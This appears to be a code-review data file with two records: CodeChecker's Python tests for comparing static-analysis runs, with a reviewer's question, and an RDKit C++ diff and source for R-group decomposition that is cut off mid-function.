self._new_runid = test_runs[1].runId # new
self._codechecker_cmd = env.codechecker_cmd()
self._report_dir = os.path.join(test_workspace, "reports")
self._test_config = env.import_test_cfg(test_workspace)
self._run_names = env.get_run_names(test_workspace)
def test_get_diff_res_count_new(self):
"""
Count the new results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
diff_res = self._cc_client.getRunResultCount_v2([base_run_id],
None,
cmp_data)
# 5 new core.CallAndMessage issues.
self.assertEqual(diff_res, 5)
def test_get_diff_res_count_new_no_base(self):
"""
Count the new results with no filter and no baseline
run ids.
"""
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
diff_res = self._cc_client.getRunResultCount_v2([],
None,
cmp_data)
# 5 new core.CallAndMessage issues.
self.assertEqual(diff_res, 5)
def test_get_diff_results_new(self):
"""
Get the new results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
diff_res = self._cc_client.getRunResults_v2([base_run_id],
500,
0,
[],
None,
cmp_data)
# 5 new core.CallAndMessage issues.
self.assertEqual(len(diff_res), 5)
def test_get_diff_results_resolved(self):
"""
Get the resolved results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.RESOLVED)
diff_res = self._cc_client.getRunResults_v2([base_run_id],
500,
0,
[],
None,
cmp_data)
self.assertEqual(len(diff_res), 3)
def test_get_diff_results_unresolved(self):
"""
Get the unresolved results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
diff_res = self._cc_client.getRunResults_v2([base_run_id],
500,
0,
[],
None,
cmp_data)
self.assertEqual(len(diff_res), 18)
def test_get_diff_res_count_resolved(self):
"""
Count the resolved results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.RESOLVED)
diff_res = self._cc_client.getRunResultCount_v2([base_run_id],
None,
cmp_data)
# 3 disappeared core.StackAddressEscape issues.
self.assertEqual(diff_res, 3)
def test_get_diff_res_count_unresolved(self):
"""
Count the unresolved results with no filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
base_count = self._cc_client.getRunResultCount_v2([base_run_id],
None,
None)
logging.debug("Base run id: %d", base_run_id)
logging.debug("Base count: %d", base_count)
base_run_res = get_all_run_results_v2(self._cc_client, base_run_id)
print_run_results(base_run_res)
new_count = self._cc_client.getRunResultCount_v2([new_run_id],
None,
None)
logging.debug("New run id: %d", new_run_id)
logging.debug("New count: %d", new_count)
new_run_res = get_all_run_results_v2(self._cc_client, new_run_id)
print_run_results(new_run_res)
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
diff_res = self._cc_client.getRunResultCount_v2([base_run_id],
None,
cmp_data)
self.assertEqual(diff_res, 18)
def test_get_diff_res_count_unresolved_filter(self):
base_run_id = self._base_runid
new_run_id = self._new_runid
filter_severity_levels = [{"MEDIUM": 1}, {"LOW": 5},
{"HIGH": 12}, {"STYLE": 0},
{"UNSPECIFIED": 0}, {"CRITICAL": 0}]
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
for level in filter_severity_levels:
for severity_level, test_result_count in level.items():
sev = get_severity_level(severity_level)
sev_filter = ReportFilter_v2(severity=[sev])
diff_result_count = self._cc_client.getRunResultCount_v2(
[base_run_id], sev_filter, cmp_data)
self.assertEqual(test_result_count, diff_result_count)
def test_get_diff_checker_counts(self):
"""
Test diff result types for new results.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
diff_res = self._cc_client.getCheckerCounts([base_run_id],
None,
cmp_data)
# core.CallAndMessage is the new checker.
test_res = {"core.CallAndMessage": 5}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_checker_counts_core_new(self):
"""
Test diff result types for new core checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
report_filter = ReportFilter_v2(checkerName=["*core*"])
diff_res = self._cc_client.getCheckerCounts([base_run_id],
report_filter,
cmp_data)
# core.CallAndMessage is the new checker.
test_res = {"core.CallAndMessage": 5}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_checker_counts_unix_resolved(self):
"""
Test diff result types for resolved unix checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
report_filter = ReportFilter_v2(checkerName=["*core*"])
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.RESOLVED)
diff_res = self._cc_client.getCheckerCounts([base_run_id],
report_filter,
cmp_data)
# Resolved core checkers.
test_res = {'core.StackAddressEscape': 3}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_checker_counts_core_unresolved(self):
"""
Test diff result types for resolved unix checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
report_filter = ReportFilter_v2(checkerName=["*core*"])
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
diff_res = self._cc_client.getCheckerCounts([base_run_id],
report_filter,
cmp_data)
# Unesolved core checkers.
test_res = {'core.NullDereference': 4, 'core.DivideZero': 3}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_checker_counts_all_unresolved(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
diff_res = self._cc_client.getCheckerCounts([base_run_id],
None,
cmp_data)
# All unresolved checkers.
test_res = {'core.DivideZero': 3,
'core.NullDereference': 4,
'cplusplus.NewDelete': 5,
'deadcode.DeadStores': 5,
'unix.Malloc': 1}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_severity_counts_all_unresolved(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
sev_res = self._cc_client.getSeverityCounts([base_run_id],
None,
cmp_data)
test_res = {shared.ttypes.Severity.HIGH: 12,
shared.ttypes.Severity.LOW: 5,
shared.ttypes.Severity.MEDIUM: 1}
self.assertDictEqual(sev_res, test_res)
def test_get_diff_severity_counts_all_new(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
sev_res = self._cc_client.getSeverityCounts([base_run_id],
None,
cmp_data)
test_res = {shared.ttypes.Severity.HIGH: 5}
self.assertDictEqual(sev_res, test_res)
def test_get_diff_new_review_status_counts(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.NEW)
res = self._cc_client.getReviewStatusCounts([base_run_id],
None,
cmp_data)
test_res = {shared.ttypes.ReviewStatus.UNREVIEWED: 5}
self.assertDictEqual(res, test_res)
def test_get_diff_unres_review_status_counts(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
res = self._cc_client.getReviewStatusCounts([base_run_id],
None,
cmp_data)
test_res = {shared.ttypes.ReviewStatus.UNREVIEWED: 18}
self.assertDictEqual(res, test_res)
def test_get_diff_res_review_status_counts(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.RESOLVED)
res = self._cc_client.getReviewStatusCounts([base_run_id],
None,
cmp_data)
test_res = {shared.ttypes.ReviewStatus.UNREVIEWED: 3}
self.assertDictEqual(res, test_res)
def test_get_diff_res_types_resolved(self):
"""
Test diff result types for resolved results.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.RESOLVED)
diff_res = self._cc_client.getCheckerCounts([base_run_id],
None,
cmp_data)
test_res = {'core.StackAddressEscape': 3}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_res_types_unresolved(self):
"""
Test diff result types for unresolved results with no filter
on the api.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
diff_res_types_filter = self._testproject_data[self._clang_to_test][
'diff_res_types_filter']
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
diff_res = \
self._cc_client.getCheckerCounts([base_run_id],
None,
cmp_data)
test_res = {'cplusplus.NewDelete': 5,
'deadcode.DeadStores': 5,
'unix.Malloc': 1,
'core.NullDereference': 4,
'core.DivideZero': 3}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_res_types_unresolved_filter(self):
"""
Test diff result types for unresolved results with filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
diff_res_types_filter = self._testproject_data[self._clang_to_test][
'diff_res_types_filter']
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
for level in diff_res_types_filter:
for checker_name, test_result_count in level.items():
checker_filter = ReportFilter_v2(checkerName=[checker_name])
diff_res = \
self._cc_client.getCheckerCounts([base_run_id],
checker_filter,
cmp_data)
# There should be only one result for each checker name.
self.assertEqual(len(diff_res), 1)
self.assertEqual(test_result_count, diff_res[checker_name])
def test_local_compare_res_count_new(self):
"""
Count the new results with no filter in local compare mode.
"""
base_run_name = self._run_names[0]
vh = self._test_config['codechecker_cfg']['viewer_host']
vp = self._test_config['codechecker_cfg']['viewer_port']
diff_cmd = [self._codechecker_cmd, "cmd", "diff",
"--new",
"--host", vh,
"--port", str(vp),
"-b", base_run_name,
"-n", self._report_dir
]
print(diff_cmd)
process = subprocess.Popen(
diff_cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=os.environ['TEST_WORKSPACE'])
out, err = process.communicate()
print(out+err)
# 5 new core.CallAndMessage issues.
count = len(re.findall(r'\[core\.CallAndMessage\]', out))
self.assertEqual(count, 5)
def test_local_compare_res_count_resovled(self):
"""
Count the resolved results with no filter in local compare mode.
"""
base_run_name = self._run_names[0]
vh = self._test_config['codechecker_cfg']['viewer_host']
vp = self._test_config['codechecker_cfg']['viewer_port']
diff_cmd = [self._codechecker_cmd, "cmd", "diff",
"--resolved",
"--host", vh,
"--port", str(vp),
"-b", base_run_name,
"-n", self._report_dir
]
print(diff_cmd)
process = subprocess.Popen(
diff_cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=os.environ['TEST_WORKSPACE'])
out, err = process.communicate()
print(out+err)
# # 3 disappeared core.StackAddressEscape issues
count = len(re.findall(r'\[core\.StackAddressEscape\]', out))
self.assertEqual(count, 3)
def test_local_compare_res_count_unresovled(self):
"""
Count the unresolved results with no filter in local compare mode.
"""
base_run_name = self._run_names[0]
vh = self._test_config['codechecker_cfg']['viewer_host']
vp = self._test_config['codechecker_cfg']['viewer_port']
diff_cmd = [self._codechecker_cmd, "cmd", "diff",
"--unresolved",
"--host", vh,
"--port", str(vp),
"-b", base_run_name,
"-n", self._report_dir
]
print(diff_cmd)
process = subprocess.Popen(
diff_cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=os.environ['TEST_WORKSPACE'])
out, err = process.communicate()
print(out+err)
# # 3 disappeared core.StackAddressEscape issues
count = len(re.findall(r'\[core\.DivideZero\]', out))
self.assertEqual(count, 3)
count = len(re.findall(r'\[deadcode\.DeadStores\]', out))
self.assertEqual(count, 5)
count = len(re.findall(r'\[core\.NullDereference\]', out))
self.assertEqual(count, 4)
count = len(re.findall(r'\[cplusplus\.NewDelete\]', out))
self.assertEqual(count, 5)
count = len(re.findall(r'\[unix\.Malloc\]', out))
self.assertEqual(count, 1)
count = len(re.findall(r'\[core.DivideZero\]', out))
self.assertEqual(count, 3)
| 1 | 7,514 | What is the actual change here, why is this test change needed? Now the diff will send back more data? | Ericsson-codechecker | c |
@@ -89,6 +89,17 @@ int RGroupDecomposition::add(const ROMol &inmol) {
const bool addCoords = true;
MolOps::addHs(mol, explicitOnly, addCoords);
+ // mark any wildcards in input molecule:
+ for (auto &atom : mol.atoms()) {
+ if (atom->getAtomicNum() == 0) {
+ atom->setIsotope(1000U);
+ // clean any existing R group numbers
+ atom->setAtomMapNum(0);
+ if (atom->hasProp(common_properties::_MolFileRLabel)) {
+ atom->clearProp(common_properties::_MolFileRLabel);
+ }
+ }
+ }
int core_idx = 0;
const RCore *rcore = nullptr;
std::vector<MatchVectType> tmatches; | 1 | //
// Copyright (c) 2017-2021, Novartis Institutes for BioMedical Research Inc.
// and other RDKit contributors
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
// * Neither the name of Novartis Institutes for BioMedical Research Inc.
// nor the names of its contributors may be used to endorse or promote
// products derived from this software without specific prior written
// permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
#include "RGroupDecomp.h"
#include "RGroupDecompData.h"
#include <GraphMol/RDKitBase.h>
#include <GraphMol/Substruct/SubstructMatch.h>
#include <GraphMol/SmilesParse/SmilesWrite.h>
#include <GraphMol/SmilesParse/SmartsWrite.h>
#include <GraphMol/SmilesParse/SmilesParse.h>
#include <GraphMol/ChemTransforms/ChemTransforms.h>
#include <GraphMol/FMCS/FMCS.h>
#include <boost/scoped_ptr.hpp>
#include <boost/dynamic_bitset.hpp>
#include <set>
#include <utility>
#include <vector>
// #define VERBOSE 1
namespace RDKit {
// Attachment Points
// labeled cores => isotopes
// atom mappings
// atom indices => use -1 - atom index, range is [-1, ...., -num_atoms]
const std::string RLABEL = "tempRlabel";
const std::string RLABEL_TYPE = "tempRlabelType";
const std::string RLABEL_CORE_INDEX = "rLabelCoreIndex";
const std::string SIDECHAIN_RLABELS = "sideChainRlabels";
const std::string done = "RLABEL_PROCESSED";
const std::string CORE = "Core";
const std::string RPREFIX = "R";
namespace {
void ADD_MATCH(R_DECOMP &match, int rlabel) {
if (match.find(rlabel) == match.end()) {
match[rlabel] = boost::make_shared<RGroupData>();
}
}
} // namespace
RGroupDecomposition::RGroupDecomposition(
const ROMol &inputCore, const RGroupDecompositionParameters ¶ms)
: data(new RGroupDecompData(inputCore, params)) {}
RGroupDecomposition::RGroupDecomposition(
const std::vector<ROMOL_SPTR> &cores,
const RGroupDecompositionParameters ¶ms)
: data(new RGroupDecompData(cores, params)) {}
RGroupDecomposition::~RGroupDecomposition() { delete data; }
int RGroupDecomposition::add(const ROMol &inmol) {
// get the sidechains if possible
// Add hs for better symmetrization
RWMol mol(inmol);
const bool explicitOnly = false;
const bool addCoords = true;
MolOps::addHs(mol, explicitOnly, addCoords);
int core_idx = 0;
const RCore *rcore = nullptr;
std::vector<MatchVectType> tmatches;
std::vector<MatchVectType> tmatches_filtered;
// Find the first matching core (onlyMatchAtRGroups)
// or the first core that requires the smallest number
// of newly added labels
int global_min_heavy_nbrs = -1;
SubstructMatchParameters sssparams(params().substructmatchParams);
sssparams.uniquify = false;
sssparams.recursionPossible = true;
for (const auto &core : data->cores) {
{
// matching the core to the molecule is a two step process
// First match to a reduced representation (the core minus terminal
// R-groups). Next, match the R-groups. We do this as the core may not be
// a substructure match for the molecule if a single molecule atom matches
// 2 RGroup attachments (see https://github.com/rdkit/rdkit/pull/4002)
// match the reduced represenation:
std::vector<MatchVectType> baseMatches =
SubstructMatch(mol, *core.second.matchingMol, sssparams);
tmatches.clear();
for (const auto &baseMatch : baseMatches) {
// Match the R Groups
auto matchesWithDummy =
core.second.matchTerminalUserRGroups(mol, baseMatch, sssparams);
tmatches.insert(tmatches.end(), matchesWithDummy.cbegin(),
matchesWithDummy.cend());
}
}
if (tmatches.empty()) {
continue;
}
std::vector<int> tmatches_heavy_nbrs(tmatches.size(), 0);
size_t i = 0;
for (const auto &mv : tmatches) {
bool passes_filter = data->params.onlyMatchAtRGroups;
boost::dynamic_bitset<> target_match_indices(mol.getNumAtoms());
for (const auto &match : mv) {
target_match_indices[match.second] = 1;
}
// target atoms that map to user defined R-groups
std::vector<int> targetAttachments;
for (const auto &match : mv) {
const Atom *atm = mol.getAtomWithIdx(match.second);
// is this a labelled rgroup or not?
if (!core.second.isCoreAtomUserLabelled(match.first)) {
// nope... if any neighbor is not part of the substructure
// make sure we are a hydrogen, otherwise, skip the match
for (const auto &nbri :
boost::make_iterator_range(mol.getAtomNeighbors(atm))) {
const auto &nbr = mol[nbri];
if (nbr->getAtomicNum() != 1 &&
!target_match_indices[nbr->getIdx()]) {
if (data->params.onlyMatchAtRGroups) {
passes_filter = false;
break;
} else {
++tmatches_heavy_nbrs[i];
}
}
}
} else {
// labelled R-group
if (core.second.isTerminalRGroupWithUserLabel(match.first)) {
targetAttachments.push_back(match.second);
}
}
if (!passes_filter && data->params.onlyMatchAtRGroups) {
break;
}
if (passes_filter && data->params.onlyMatchAtRGroups) {
for (auto attachmentIdx : targetAttachments) {
if (!core.second.checkAllBondsToAttachmentPointPresent(
mol, attachmentIdx, mv)) {
passes_filter = false;
break;
}
}
}
}
if (passes_filter) {
tmatches_filtered.push_back(mv);
}
++i;
}
if (!data->params.onlyMatchAtRGroups) {
int min_heavy_nbrs = *std::min_element(tmatches_heavy_nbrs.begin(),
tmatches_heavy_nbrs.end());
if (global_min_heavy_nbrs == -1 ||
min_heavy_nbrs < global_min_heavy_nbrs) {
i = 0;
tmatches_filtered.clear();
for (const auto heavy_nbrs : tmatches_heavy_nbrs) {
if (heavy_nbrs <= min_heavy_nbrs) {
tmatches_filtered.push_back(std::move(tmatches[i]));
}
++i;
}
global_min_heavy_nbrs = min_heavy_nbrs;
rcore = &core.second;
core_idx = core.first;
if (global_min_heavy_nbrs == 0) {
break;
}
}
} else if (!tmatches_filtered.empty()) {
rcore = &core.second;
core_idx = core.first;
break;
}
}
tmatches = std::move(tmatches_filtered);
if (tmatches.size() > 1) {
if (data->params.matchingStrategy == NoSymmetrization) {
tmatches.resize(1);
} else if (data->matches.size() == 0) {
// Greedy strategy just grabs the first match and
// takes the best matches from the rest
if (data->params.matchingStrategy == Greedy) {
tmatches.resize(1);
}
}
}
if (rcore == nullptr) {
BOOST_LOG(rdDebugLog) << "No core matches" << std::endl;
return -1;
}
// strategies
// ==========
// Exhaustive - saves all matches and optimizes later exhaustive
// May never finish due to combinatorial complexity
// Greedy - matches to *FIRST* available match
// GreedyChunks - default - process every N chunks
// Should probably scan all mols first to find match with
// smallest number of matches...
std::vector<RGroupMatch> potentialMatches;
std::unique_ptr<ROMol> tMol;
for (const auto &tmatche : tmatches) {
const bool replaceDummies = false;
const bool labelByIndex = true;
const bool requireDummyMatch = false;
bool hasCoreDummies = false;
auto coreCopy =
rcore->replaceCoreAtomsWithMolMatches(hasCoreDummies, mol, tmatche);
tMol.reset(replaceCore(mol, *coreCopy, tmatche, replaceDummies,
labelByIndex, requireDummyMatch));
#ifdef VERBOSE
std::cerr << "Core Match core_idx " << core_idx << " idx "
<< data->matches.size() << ": " << MolToSmarts(*coreCopy)
<< std::endl;
#endif
if (tMol) {
#ifdef VERBOSE
std::cerr << "All Fragments " << MolToSmiles(*tMol) << std::endl;
#endif
R_DECOMP match;
// rlabel rgroups
MOL_SPTR_VECT fragments = MolOps::getMolFrags(*tMol, false);
std::set<int> coreAtomAnyMatched;
for (size_t i = 0; i < fragments.size(); ++i) {
std::vector<int> attachments;
boost::shared_ptr<ROMol> &newMol = fragments[i];
newMol->setProp<int>("core", core_idx);
newMol->setProp<int>("idx", data->matches.size());
newMol->setProp<int>("frag_idx", i);
#ifdef VERBOSE
std::cerr << "Fragment " << MolToSmiles(*newMol) << std::endl;
#endif
for (auto at : newMol->atoms()) {
unsigned int elno = at->getAtomicNum();
if (elno == 0) {
unsigned int index =
at->getIsotope(); // this is the index into the core
// it messes up when there are multiple ?
int rlabel;
auto coreAtom = rcore->core->getAtomWithIdx(index);
coreAtomAnyMatched.insert(index);
if (coreAtom->getPropIfPresent(RLABEL, rlabel)) {
std::vector<int> rlabelsOnSideChain;
at->getPropIfPresent(SIDECHAIN_RLABELS, rlabelsOnSideChain);
rlabelsOnSideChain.push_back(rlabel);
at->setProp(SIDECHAIN_RLABELS, rlabelsOnSideChain);
data->labels.insert(rlabel); // keep track of all labels used
attachments.push_back(rlabel);
}
}
}
if (attachments.size() > 0) {
// reject multiple attachments?
// what to do with labelled cores ?
std::string newCoreSmi = MolToSmiles(*newMol, true);
for (size_t attach_idx = 0; attach_idx < attachments.size();
++attach_idx) {
int rlabel = attachments[attach_idx];
ADD_MATCH(match, rlabel);
match[rlabel]->add(newMol, attachments);
#ifdef VERBOSE
std::cerr << "Fragment " << i << " R" << rlabel << " "
<< MolToSmiles(*newMol) << std::endl;
#endif
}
} else {
// special case, only one fragment
if (fragments.size() == 1) { // need to make a new core
// remove the sidechains
// GJ I think if we ever get here that it's really an error and I
// believe that I've fixed the case where this code was called.
// Still, I'm too scared to delete the block.
RWMol newCore(mol);
for (const auto &mvpair : tmatche) {
const Atom *coreAtm = rcore->core->getAtomWithIdx(mvpair.first);
Atom *newCoreAtm = newCore.getAtomWithIdx(mvpair.second);
int rlabel;
if (coreAtm->getPropIfPresent(RLABEL, rlabel)) {
newCoreAtm->setProp<int>(RLABEL, rlabel);
}
newCoreAtm->setProp<bool>("keep", true);
}
newCore.beginBatchEdit();
for (const auto atom : newCore.atoms()) {
if (!atom->hasProp("keep")) {
newCore.removeAtom(atom);
}
}
newCore.commitBatchEdit();
if (newCore.getNumAtoms()) {
std::string newCoreSmi = MolToSmiles(newCore, true);
// add a new core if possible
auto newcore = data->newCores.find(newCoreSmi);
int core_idx = 0;
if (newcore == data->newCores.end()) {
core_idx = data->newCores[newCoreSmi] = data->newCoreLabel--;
data->cores[core_idx] = RCore(newCore);
return add(inmol);
}
}
}
}
}
if (match.size()) {
auto numberUserGroupsInMatch = std::accumulate(
match.begin(), match.end(), 0,
[](int sum, std::pair<int, boost::shared_ptr<RGroupData>> p) {
return p.first > 0 && !p.second->is_hydrogen ? ++sum : sum;
});
int numberMissingUserGroups =
rcore->numberUserRGroups - numberUserGroupsInMatch;
CHECK_INVARIANT(numberMissingUserGroups >= 0,
"Data error in missing user rgroup count");
potentialMatches.emplace_back(
core_idx, numberMissingUserGroups, match,
hasCoreDummies || !data->params.onlyMatchAtRGroups ? coreCopy
: nullptr);
}
}
}
if (potentialMatches.size() == 0) {
BOOST_LOG(rdDebugLog) << "No attachment points in side chains" << std::endl;
return -2;
}
// in case the value ends up being changed in a future version of the code:
if (data->prunePermutations) {
data->permutationProduct = 1;
}
if (data->params.matchingStrategy != GA) {
size_t N = data->permutationProduct;
for (auto matche = data->matches.begin() + data->previousMatchSize;
matche != data->matches.end(); ++matche) {
size_t sz = matche->size();
N *= sz;
}
// oops, exponential is a pain
if (N * potentialMatches.size() > 100000) {
data->permutationProduct = N;
data->process(data->prunePermutations);
}
}
data->matches.push_back(potentialMatches);
if (data->matches.size()) {
if (data->params.matchingStrategy & Greedy ||
(data->params.matchingStrategy & GreedyChunks &&
data->matches.size() > 1 &&
data->matches.size() % data->params.chunkSize == 0)) {
data->process(data->prunePermutations);
}
}
return data->matches.size() - 1;
}
bool RGroupDecomposition::process() { return processAndScore().success; }
RGroupDecompositionProcessResult RGroupDecomposition::processAndScore() {
try {
const bool finalize = true;
return data->process(data->prunePermutations, finalize);
} catch (...) {
return RGroupDecompositionProcessResult(false, -1);
}
}
std::vector<std::string> RGroupDecomposition::getRGroupLabels() const {
// this is a bit of a cheat
RGroupColumns cols = getRGroupsAsColumns();
std::vector<std::string> labels;
for (auto it : cols) {
labels.push_back(it.first);
}
std::sort(labels.begin(), labels.end());
return labels;
}
RWMOL_SPTR RGroupDecomposition::outputCoreMolecule(
const RGroupMatch &match, const UsedLabelMap &usedLabelMap) const {
const auto &core = data->cores[match.core_idx];
if (!match.matchedCore) {
return core.labelledCore;
}
auto coreWithMatches = core.coreWithMatches(*match.matchedCore);
for (auto atomIdx = coreWithMatches->getNumAtoms(); atomIdx--;) {
auto atom = coreWithMatches->getAtomWithIdx(atomIdx);
if (atom->getAtomicNum()) {
continue;
}
auto label = atom->getAtomMapNum();
Atom *nbrAtom = nullptr;
for (const auto &nbri :
boost::make_iterator_range(coreWithMatches->getAtomNeighbors(atom))) {
nbrAtom = (*coreWithMatches)[nbri];
break;
}
if (nbrAtom) {
bool isUserDefinedLabel = usedLabelMap.isUserDefined(label);
auto numExplicitHs = nbrAtom->getNumExplicitHs();
if (usedLabelMap.getIsUsed(label)) {
if (numExplicitHs) {
nbrAtom->setNumExplicitHs(numExplicitHs - 1);
}
} else if (!isUserDefinedLabel ||
data->params.removeAllHydrogenRGroupsAndLabels) {
coreWithMatches->removeAtom(atomIdx);
// if we remove an unused label from an aromatic atom,
// we need to check whether we need to adjust its explicit
// H count, or it will fail to kekulize
if (isUserDefinedLabel && nbrAtom->getIsAromatic()) {
nbrAtom->updatePropertyCache(false);
if (!numExplicitHs) {
nbrAtom->setNumExplicitHs(nbrAtom->getExplicitValence() -
nbrAtom->getDegree());
}
}
}
nbrAtom->updatePropertyCache(false);
}
}
return coreWithMatches;
}
RGroupRows RGroupDecomposition::getRGroupsAsRows() const {
std::vector<RGroupMatch> permutation = data->GetCurrentBestPermutation();
RGroupRows groups;
auto usedLabelMap = UsedLabelMap(data->finalRlabelMapping);
for (auto it = permutation.begin(); it != permutation.end(); ++it) {
auto Rs_seen(usedLabelMap);
// make a new rgroup entry
groups.push_back(RGroupRow());
RGroupRow &out_rgroups = groups.back();
const R_DECOMP &in_rgroups = it->rgroups;
for (const auto &rgroup : in_rgroups) {
const auto realLabel = data->finalRlabelMapping.find(rgroup.first);
CHECK_INVARIANT(realLabel != data->finalRlabelMapping.end(),
"unprocessed rlabel, please call process() first.");
Rs_seen.setIsUsed(realLabel->second);
out_rgroups[RPREFIX + std::to_string(realLabel->second)] =
rgroup.second->combinedMol;
}
out_rgroups[CORE] = outputCoreMolecule(*it, Rs_seen);
}
return groups;
}
//! return rgroups in column order group[attachment_point][molidx] = ROMol
RGroupColumns RGroupDecomposition::getRGroupsAsColumns() const {
std::vector<RGroupMatch> permutation = data->GetCurrentBestPermutation();
RGroupColumns groups;
std::unordered_set<std::string> rGroupWithRealMol{CORE};
auto usedLabelMap = UsedLabelMap(data->finalRlabelMapping);
unsigned int molidx = 0;
for (auto it = permutation.begin(); it != permutation.end(); ++it, ++molidx) {
auto Rs_seen(usedLabelMap);
const R_DECOMP &in_rgroups = it->rgroups;
for (const auto &rgroup : in_rgroups) {
const auto realLabel = data->finalRlabelMapping.find(rgroup.first);
CHECK_INVARIANT(realLabel != data->finalRlabelMapping.end(),
"unprocessed rlabel, please call process() first.");
CHECK_INVARIANT(rgroup.second->combinedMol->hasProp(done),
"Not done! Call process()");
CHECK_INVARIANT(!Rs_seen.getIsUsed(realLabel->second),
"R group label appears multiple times!");
Rs_seen.setIsUsed(realLabel->second);
std::string r = RPREFIX + std::to_string(realLabel->second);
RGroupColumn &col = groups[r];
if (molidx && col.size() < molidx - 1) {
col.resize(molidx - 1);
}
col.push_back(rgroup.second->combinedMol);
rGroupWithRealMol.insert(r);
}
groups[CORE].push_back(outputCoreMolecule(*it, Rs_seen));
// add empty entries to columns where this molecule didn't appear
for (const auto &realLabel : data->finalRlabelMapping) {
if (!Rs_seen.getIsUsed(realLabel.second)) {
std::string r = RPREFIX + std::to_string(realLabel.second);
groups[r].push_back(boost::make_shared<RWMol>());
}
}
}
// purge R-group entries that have no mols
for (auto it = groups.begin(); it != groups.end();) {
auto itToErase = groups.end();
if (!rGroupWithRealMol.count(it->first)) {
itToErase = it;
}
++it;
if (itToErase != groups.end()) {
groups.erase(itToErase);
}
}
return groups;
}
const RGroupDecompositionParameters &RGroupDecomposition::params() const {
return data->params;
}
namespace {
std::vector<unsigned int> Decomp(RGroupDecomposition &decomp,
const std::vector<ROMOL_SPTR> &mols) {
auto t0 = std::chrono::steady_clock::now();
std::vector<unsigned int> unmatched;
for (size_t i = 0; i < mols.size(); ++i) {
int v = decomp.add(*mols[i].get());
if (v == -1) {
unmatched.push_back(i);
}
